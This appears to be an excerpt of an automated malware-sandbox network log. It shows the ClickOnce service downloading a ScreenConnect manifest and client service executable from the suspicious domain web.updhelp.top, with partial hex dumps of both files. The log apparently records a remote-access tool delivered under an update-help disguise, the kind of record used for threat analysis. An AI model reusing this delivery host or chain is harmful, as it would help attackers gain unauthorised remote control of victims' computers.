                                                                                                                  2025-04-12 15:57:58 UTC1369INData Raw: 37 58 4a 7a 2f 39 6b 4e 46 32 68 74 30 63 73 47 42 63 38 77 32 6f 37 75 43 4a 6f 62 30 35 34 54 68 4f 32 6d 36 37 4e 70 33 37 35 53 46 54 57 73 50 4b 36 57 72 78 6f 6a 37 62 51 37 67 7a 79 45 38 34 46 4a 4b 5a 39 64 33 4f 56 47 33 5a 58 51 49 55 48 30 41 7a 66 41 50 69 6c 62 4c 43 49 58 56 7a 55 73 74 47 32 4d 51 30 48 4b 4b 6c 53 34 33 4e 62 33 59 33 4c 49 55 2f 47 73 34 6d 36 52 69 2b 6b 41 65 77 51 33 2b 56 69 43 43 43 63 50 44 4d 79 75 2f 39 4b 54 56 63 48 34 6b 34 56 66 63 33 69 6f 73 4a 6f 63 73 4c 36 54 45 61 2f 79 34 5a 58 44 6c 78 34 62 36 63 70 77 6f 47 31 69 5a 6e 74 35 4c 6d 54 6c 2f 65 65 71 78 4a 7a 79 36 6b 64 4a 4b 74 32 7a 79 6b 6e 49 59 66 34 38 46 57 47 79 73 6a 2f 34 2b 31 36 6f 68 37 63 47 76 6d 6f 4c 72 39 4f 6a 39 46 70 73 54 6f 46
                                                                                                                  Data Ascii: 7XJz/9kNF2ht0csGBc8w2o7uCJob054ThO2m67Np375SFTWsPK6Wrxoj7bQ7gzyE84FJKZ9d3OVG3ZXQIUH0AzfAPilbLCIXVzUstG2MQ0HKKlS43Nb3Y3LIU/Gs4m6Ri+kAewQ3+ViCCCcPDMyu/9KTVcH4k4Vfc3iosJocsL6TEa/y4ZXDlx4b6cpwoG1iZnt5LmTl/eeqxJzy6kdJKt2zyknIYf48FWGysj/4+16oh7cGvmoLr9Oj9FpsToF


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.2460843104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:57:59 UTC97OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  2025-04-12 15:58:00 UTC1070INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:00 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 17858
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.Client.manifest"; filename*=UTF-8''ScreenConnect.Client.manifest
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X5XpKzNH729MQd1re5L2UWk%2B%2Bv1%2B95yXtounSFAskbE2C8uUf7XcZZefUFzyfEZWrsaDn%2BcQaCKRhz%2BaDEs8VmCFH%2ByiStj6O50jrmm8DUD0Qql3ntHf%2BRjZ8nV05jbbz5M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec31ed32c428-JAX
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=112500&min_rtt=112435&rtt_var=23818&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=712&delivery_rate=35846&cwnd=252&unsent_bytes=0&cid=9580ff60757ca205&ts=437&x=0"
                                                                                                                  2025-04-12 15:58:00 UTC299INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                  2025-04-12 15:58:00 UTC1369INData Raw: 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 63 6f 2e 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 63 6c 69 63 6b 6f 6e 63 65 2e 76 31 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 33 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 33 22 20 78 6d 6c 6e 73 3a 64 73 69 67 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 22 20 78 6d 6c 6e 73 3a 63 6f 2e 76 32 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 63 6c 69 63 6b 6f 6e 63 65 2e 76 32 22 3e 0d 0a 20 20 3c 61 73
                                                                                                                  Data Ascii: si="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2"> <as
                                                                                                                  2025-04-12 15:58:00 UTC1369INData Raw: 2f 3e 0d 0a 20 20 20 20 20 20 3c 2f 6f 73 56 65 72 73 69 6f 6e 49 6e 66 6f 3e 0d 0a 20 20 20 20 3c 2f 64 65 70 65 6e 64 65 6e 74 4f 53 3e 0d 0a 20 20 3c 2f 64 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 3c 64 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 20 20 3c 64 65 70 65 6e 64 65 6e 74 41 73 73 65 6d 62 6c 79 20 64 65 70 65 6e 64 65 6e 63 79 54 79 70 65 3d 22 70 72 65 52 65 71 75 69 73 69 74 65 22 20 61 6c 6c 6f 77 44 65 6c 61 79 65 64 42 69 6e 64 69 6e 67 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 4d 69 63 72 6f 73 6f 66 74 2e 57 69 6e 64 6f 77 73 2e 43 6f 6d 6d 6f 6e 4c 61 6e 67 75 61 67 65 52 75 6e 74 69 6d 65 22 20 76 65 72 73 69 6f 6e 3d 22 32 2e 30 2e 35 30 37 32 37 2e 30 22
                                                                                                                  Data Ascii: /> </osVersionInfo> </dependentOS> </dependency> <dependency> <dependentAssembly dependencyType="preRequisite" allowDelayedBinding="true"> <assemblyIdentity name="Microsoft.Windows.CommonLanguageRuntime" version="2.0.50727.0"
                                                                                                                  2025-04-12 15:58:00 UTC1369INData Raw: 72 69 74 68 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 48 61 73 68 54 72 61 6e 73 66 6f 72 6d 73 2e 49 64 65 6e 74 69 74 79 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 73 68 61 31 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 56 61 6c 75 65 3e 63 65 53 4d 69 4e 2f 2f 35 4a 77 63 46 56 47 42 35 32 42 68 48 47 58 32 79 6c 41 3d 3c 2f 64 73 69 67 3a 44 69 67 65 73 74 56 61 6c 75 65 3e 0d 0a 20 20 20 20 20 20 3c 2f
                                                                                                                  Data Ascii: rithm="urn:schemas-microsoft-com:HashTransforms.Identity" /> </dsig:Transforms> <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" /> <dsig:DigestValue>ceSMiN//5JwcFVGB52BhHGX2ylA=</dsig:DigestValue> </
                                                                                                                  2025-04-12 15:58:00 UTC1369INData Raw: 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 48 61 73 68 54 72 61 6e 73 66 6f 72 6d 73 2e 49 64 65 6e 74 69 74 79 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 73 68 61 31 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 56 61 6c 75 65 3e 39 5a 66 56 47 61 57 61 58 39 67 4a 36 4b 48 67 6c 2f 33 57 34 41 64 2f 63 74 34 3d 3c 2f 64 73 69 67 3a 44 69 67 65 73 74 56 61 6c 75 65 3e 0d 0a 20 20 20 20 20 20 3c 2f 68 61 73 68 3e 0d 0a 20 20 20 20 3c
                                                                                                                  Data Ascii: chemas-microsoft-com:HashTransforms.Identity" /> </dsig:Transforms> <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" /> <dsig:DigestValue>9ZfVGaWaX9gJ6KHgl/3W4Ad/ct4=</dsig:DigestValue> </hash> <
                                                                                                                  2025-04-12 15:58:00 UTC1369INData Raw: 3c 2f 66 69 6c 65 3e 0d 0a 20 20 3c 66 69 6c 65 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 2e 65 78 65 22 20 73 69 7a 65 3d 22 36 31 32 30 38 22 3e 0d 0a 20 20 20 20 3c 68 61 73 68 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 20 41 6c 67 6f 72 69 74 68 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 48 61 73 68 54 72 61 6e 73 66 6f 72 6d 73 2e 49 64 65 6e 74 69 74 79 22 20 2f 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 4d 65 74 68 6f
                                                                                                                  Data Ascii: </file> <file name="ScreenConnect.WindowsBackstageShell.exe" size="61208"> <hash> <dsig:Transforms> <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" /> </dsig:Transforms> <dsig:DigestMetho
                                                                                                                  2025-04-12 15:58:00 UTC1369INData Raw: 66 74 2d 63 6f 6d 3a 48 61 73 68 54 72 61 6e 73 66 6f 72 6d 73 2e 49 64 65 6e 74 69 74 79 22 20 2f 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 73 68 61 31 22 20 2f 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 56 61 6c 75 65 3e 31 4b 61 72 31 79 56 76 64 69 53 56 4f 5a 4c 73 2f 70 78 75 2b 2f 4a 53 6b 59 41 3d 3c 2f 64 73 69 67 3a 44 69 67 65 73 74 56 61 6c 75 65 3e 0d 0a 20 20 20 20 3c 2f 68 61 73 68 3e 0d 0a 20 20 3c 2f 66 69 6c 65 3e 0d 0a 20 20 3c 66 69 6c 65 20 6e 61 6d 65 3d 22 53 63
                                                                                                                  Data Ascii: ft-com:HashTransforms.Identity" /> </dsig:Transforms> <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" /> <dsig:DigestValue>1Kar1yVvdiSVOZLs/pxu+/JSkYA=</dsig:DigestValue> </hash> </file> <file name="Sc
                                                                                                                  2025-04-12 15:58:00 UTC1369INData Raw: 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 65 6d 74 32 61 36 49 62 36 76 2b 52 6d 45 37 6e 53 50 78 47 69 6b 54 72 73 45 46 48 67 67 42 4f 47 78 38 6a 66 69 77 35 54 44 57 55 45 72 44 52 43 30 46 56 31 41 47 79 31 78 73 52 41 4b 47 71 41 76 63 78 4a 2f 44 73 59 6a 67 4a 38 6d 6a 45 35 70 4f 79 7a 35 62 2f 41 7a 44 2f 43 42 34 55 6d 63 56 6e 4b 6a 77 4b 74 6c 67 77 6f 6e 61 56 4d 4a 77 47 42 77 74 43 6c 57 64 4a 65 64 72 4a 38 2f 6f 62 55 4e 4b 72 46 76 6a 37 57 6d 49 54 6f 44 35 4c 4c 4a 51 66 6d 4e 49 6e 64 77 6d 44 69 74 39 30 55 38 4c 37 48 4b 44 2b 72 55 71 53 43 66 6f 43 57 30 36 64 6f 77 49 50 7a 75 36 57 74 52 62 38 4e 77 4e 78 64 47 41 71 4a 61 4d 64 70 74 78 39 61 4b 72
                                                                                                                  Data Ascii: /Reference></SignedInfo><SignatureValue>emt2a6Ib6v+RmE7nSPxGikTrsEFHggBOGx8jfiw5TDWUErDRC0FV1AGy1xsRAKGqAvcxJ/DsYjgJ8mjE5pOyz5b/AzD/CB4UmcVnKjwKtlgwonaVMJwGBwtClWdJedrJ8/obUNKrFvj7WmIToD5LLJQfmNIndwmDit90U8L7HKD+rUqSCfoCW06dowIPzu6WtRb8NwNxdGAqJaMdptx9aKr
                                                                                                                  2025-04-12 15:58:00 UTC1369INData Raw: 4b 48 6f 57 4e 56 5a 46 2f 41 6b 55 4c 47 41 74 46 41 2b 67 52 72 65 2f 31 31 4d 6f 47 45 2f 33 76 66 6a 35 34 4e 5a 65 59 67 48 49 30 6b 4b 54 45 45 66 31 6d 39 4d 6f 72 44 55 33 64 38 7a 76 70 67 51 49 69 48 75 45 2f 44 59 78 4d 42 52 6a 52 68 6f 64 63 38 43 31 7a 48 54 57 32 43 6b 46 33 66 6b 6a 76 62 71 77 4a 36 4d 52 7a 44 6a 54 2b 68 62 32 4f 61 55 3d 3c 2f 4d 6f 64 75 6c 75 73 3e 3c 45 78 70 6f 6e 65 6e 74 3e 41 51 41 42 3c 2f 45 78 70 6f 6e 65 6e 74 3e 3c 2f 52 53 41 4b 65 79 56 61 6c 75 65 3e 3c 2f 4b 65 79 56 61 6c 75 65 3e 3c 6d 73 72 65 6c 3a 52 65 6c 44 61 74 61 20 78 6d 6c 6e 73 3a 6d 73 72 65 6c 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 72 65 6c 2f 32 30 30 35 2f 72
                                                                                                                  Data Ascii: KHoWNVZF/AkULGAtFA+gRre/11MoGE/3vfj54NZeYgHI0kKTEEf1m9MorDU3d8zvpgQIiHuE/DYxMBRjRhodc8C1zHTW2CkF3fkjvbqwJ6MRzDjT+hb2OaU=</Modulus><Exponent>AQAB</Exponent></RSAKeyValue></KeyValue><msrel:RelData xmlns:msrel="http://schemas.microsoft.com/windows/rel/2005/r
                                                                                                                  2025-04-12 15:58:00 UTC1369INData Raw: 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 73 68 61 31 22 20 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 43 42 50 6d 52 68 4a 4e 69 62 73 7a 63 74 56 67 2f 4e 38 76 70 43 58 69 61 6d 55 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 34 6c 61 73 57 68 47 55 6b 75 62 6b 74 74 5a 66 49 34 6f 49 35 77 71 69 64 7a 75 66 4d 2f 6e 55 52 33 6e 5a 44 58 6c 46 2f 32 56 64 67 69 66 61 59 41 48 50 6a 6e 73 5a 73 4d 38 59 55 43 4b 41 73 35 53 58 77 72 4d 35 44 6b 73 30 46 59 34 7a 42 7a 61 36 4c 38 42 43 74 78 4c 47 7a 36 67 58 30 6a 2b 56 4f 70 4a 2b 68 71 51 36 5a 30 4a 47 58 2b 5a 43 73 7a 54 44 6c 2b 4a 59 62 57 43 44 75 6d 51 76 6c 65 37 52 64
                                                                                                                  Data Ascii: 00/09/xmldsig#sha1" /><DigestValue>CBPmRhJNibszctVg/N8vpCXiamU=</DigestValue></Reference></SignedInfo><SignatureValue>4lasWhGUkubkttZfI4oI5wqidzufM/nUR3nZDXlF/2VdgifaYAHPjnsZsM8YUCKAs5SXwrM5Dks0FY4zBza6L8BCtxLGz6gX0j+VOpJ+hqQ6Z0JGX+ZCszTDl+JYbWCDumQvle7Rd


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.2460847104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:58:01 UTC123OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-04-12 15:58:02 UTC1089INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:02 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 95512
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.ClientService.exe"; filename*=UTF-8''ScreenConnect.ClientService.exe
                                                                                                                  CF-Cache-Status: BYPASS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0DhfCKEg5LM3dQZC4XbAFz0FuhzQ65HDPo3niqkSzaMd%2F%2F4h0YbMuBq0frFu2LVugGQJVMes%2FE6hkv9E2zoBWDke4ZxDEktLBDaok925QwsawyH%2F9deEyZUjn9QMdiYvl3k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec3fbfe353da-ATL
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=106041&min_rtt=106019&rtt_var=22401&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=714&delivery_rate=38053&cwnd=252&unsent_bytes=0&cid=78e40939453b03cb&ts=999&x=0"
                                                                                                                  2025-04-12 15:58:02 UTC280INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                  2025-04-12 15:58:02 UTC1369INData Raw: ad e6 77 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 21 00 c0 00 00 00 88 00 00 00 00 00 00 7f 21 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 01 00 00 04 00 00 23 4e 02 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 2e 01 00 78 00 00 00 00 60 01 00 50 04 00 00 00 00 00 00 00 00 00 00 00 4c 01 00 18 29 00 00 00 70 01 00 c0 0f 00 00 60 21 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 20 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3a bf 00 00 00 10 00
                                                                                                                  Data Ascii: wc!!@#N@p.x`PL)p`!p @.text:
                                                                                                                  2025-04-12 15:58:02 UTC1369INData Raw: fb ff ff 8d 95 b4 fb ff ff 52 50 8b 08 ff 51 34 c7 85 b8 fb ff ff 00 00 00 00 c6 45 fc 04 8d 95 b8 fb ff ff 8b 85 b4 fb ff ff 52 68 4c 20 41 00 50 8b 08 ff 11 c7 85 bc fb ff ff 00 00 00 00 c6 45 fc 05 8d 95 bc fb ff ff 8b 85 b8 fb ff ff 52 50 8b 08 ff 51 28 c7 85 c0 fb ff ff 00 00 00 00 c6 45 fc 06 8d 95 c0 fb ff ff 8b 85 bc fb ff ff 52 50 8b 08 ff 51 50 c7 85 c4 fb ff ff 00 00 00 00 c6 45 fc 07 8b 85 c0 fb ff ff 8b 3d 58 d1 40 00 68 f8 1e 41 00 89 85 d4 fb ff ff ff d7 8b f0 89 b5 d0 fb ff ff 85 f6 0f 84 a4 03 00 00 c6 45 fc 08 8d 95 c4 fb ff ff 8b 8d d4 fb ff ff 52 56 51 8b 01 ff 50 44 56 c6 45 fc 07 ff 15 54 d1 40 00 6a 00 ff 15 50 d0 40 00 68 04 01 00 00 8d 8d e0 fd ff ff 51 50 ff 15 64 d0 40 00 8d 85 e0 fd ff ff 50 ff 15 78 d1 40 00 8d 85 e0 fd ff ff
                                                                                                                  Data Ascii: RPQ4ERhL APERPQ(ERPQPE=X@hAERVQPDVET@jP@hQPd@Px@
                                                                                                                  2025-04-12 15:58:02 UTC1369INData Raw: 41 00 c7 85 d8 fd ff ff 5c 1f 41 00 c7 85 dc fd ff ff 78 1f 41 00 6a 0a 68 04 01 00 00 8d 85 e0 fd ff ff 50 ff d7 50 e8 47 35 00 00 83 c4 10 8d 85 e0 fd ff ff ff b4 35 d4 fd ff ff 50 ff 15 6c d1 40 00 8d 85 e0 fd ff ff 50 6a 00 6a 01 6a 00 ff 15 5c d0 40 00 89 84 35 c4 fd ff ff 83 c6 04 83 fe 0c 72 b1 8d 85 c4 fd ff ff 50 68 20 17 40 00 6a 00 ff 15 00 d0 40 00 8b f8 c7 85 a8 fd ff ff 10 00 00 00 8d 85 a8 fd ff ff c7 85 b8 fd ff ff 00 00 00 00 50 57 c7 85 b4 fd ff ff 00 00 00 00 c7 85 ac fd ff ff 04 00 00 00 c7 85 b0 fd ff ff 85 00 00 00 ff 15 14 d0 40 00 83 7b 08 00 0f 86 e4 00 00 00 8b b5 a4 fd ff ff 6a 01 6a 00 6a 0c 8b 36 ff 15 60 d1 40 00 6a 04 89 85 a4 fd ff ff e8 62 06 00 00 89 85 a0 fd ff ff 83 c4 04 c7 00 00 00 00 00 33 c0 66 89 85 d0 fd ff ff 8d
                                                                                                                  Data Ascii: A\AxAjhPPG55Pl@Pjjj\@5rPh @j@PW@{jjj6`@jb3f
                                                                                                                  2025-04-12 15:58:02 UTC1369INData Raw: 33 c0 8b ca f0 0f b1 0e 85 c0 75 f0 32 c0 5e c3 b0 01 5e c3 55 8b ec 83 7d 08 00 75 07 c6 05 7c 48 41 00 01 e8 62 05 00 00 e8 b9 18 00 00 84 c0 75 04 32 c0 5d c3 e8 75 41 00 00 84 c0 75 0a 6a 00 e8 c0 18 00 00 59 eb e9 b0 01 5d c3 55 8b ec 80 3d 7d 48 41 00 00 74 04 b0 01 5d c3 56 8b 75 08 85 f6 74 05 83 fe 01 75 62 e8 f4 06 00 00 85 c0 74 26 85 f6 75 22 68 80 48 41 00 e8 dd 3f 00 00 59 85 c0 75 0f 68 8c 48 41 00 e8 ce 3f 00 00 59 85 c0 74 2b 32 c0 eb 30 83 c9 ff 89 0d 80 48 41 00 89 0d 84 48 41 00 89 0d 88 48 41 00 89 0d 8c 48 41 00 89 0d 90 48 41 00 89 0d 94 48 41 00 c6 05 7d 48 41 00 01 b0 01 5e 5d c3 6a 05 e8 9c 06 00 00 cc 6a 08 68 00 29 41 00 e8 9d 08 00 00 83 65 fc 00 b8 4d 5a 00 00 66 39 05 00 00 40 00 75 5d a1 3c 00 40 00 81 b8 00 00 40 00 50 45
                                                                                                                  Data Ascii: 3u2^^U}u|HAbu2]uAujY]U=}HAt]Vutubt&u"hHA?YuhHA?Yt+20HAHAHAHAHAHA}HA^]jjh)AeMZf9@u]<@@PE
                                                                                                                  2025-04-12 15:58:02 UTC1369INData Raw: 41 00 02 00 00 00 6a 04 58 6b c0 00 8b 0d 04 40 41 00 89 4c 05 f8 6a 04 58 c1 e0 00 8b 0d 08 40 41 00 89 4c 05 f8 68 7c d2 40 00 e8 e0 fe ff ff c9 c3 55 8b ec 83 25 b4 4b 41 00 00 83 ec 24 83 0d 0c 40 41 00 01 6a 0a ff 15 bc d0 40 00 85 c0 0f 84 ac 01 00 00 83 65 f0 00 33 c0 53 56 57 33 c9 8d 7d dc 53 0f a2 8b f3 5b 90 89 07 89 77 04 89 4f 08 33 c9 89 57 0c 8b 45 dc 8b 7d e0 89 45 f4 81 f7 47 65 6e 75 8b 45 e8 35 69 6e 65 49 89 45 fc 8b 45 e4 35 6e 74 65 6c 89 45 f8 33 c0 40 53 0f a2 8b f3 5b 90 8d 5d dc 89 03 8b 45 fc 0b 45 f8 0b c7 89 73 04 89 4b 08 89 53 0c 75 43 8b 45 dc 25 f0 3f ff 0f 3d c0 06 01 00 74 23 3d 60 06 02 00 74 1c 3d 70 06 02 00 74 15 3d 50 06 03 00 74 0e 3d 60 06 03 00 74 07 3d 70 06 03 00 75 11 8b 3d b8 4b 41 00 83 cf 01 89 3d b8 4b 41
